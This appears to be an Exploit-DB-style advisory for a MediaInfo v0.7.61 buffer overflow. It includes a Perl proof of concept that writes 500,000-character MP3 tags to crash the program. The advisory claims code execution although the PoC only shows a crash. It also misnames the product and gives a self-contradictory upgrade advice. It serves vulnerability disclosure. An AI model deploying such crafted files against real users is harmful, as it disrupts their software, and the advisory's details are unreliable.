Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit

vendor:

MediaInfo

by:

Mohammad Reza Espargham

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MediaInfo

Affected Version From: v0.7.61

Affected Version To: v0.7.61

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 / Server 2008

2018

Windows Media Player MediaInfo v0.7.61 – Buffer Overflow Exploit

A buffer overflow vulnerability exists in Windows Media Player MediaInfo v0.7.61 when a specially crafted MP3 file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.

Mitigation:

Upgrade to the latest version of Windows Media Player MediaInfo v0.7.61 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit
# Tested on Windows 7 / Server 2008
# Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   reza.espargham@owasp.org
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
#
# Github : github.com/rezasp
#
#
#
# 1 . run perl code : perl reza.pl
# 2 . open 1.mp3 by mediainfo.exe
# 3 . Crashed ;)

use MP3::Tag;

$mp3 = MP3::Tag->new('1.mp3');
$mp3->title_set('A' x 500000);
$mp3->artist_set('A' x 500000);
$mp3->update_tags();  
$mp3->close();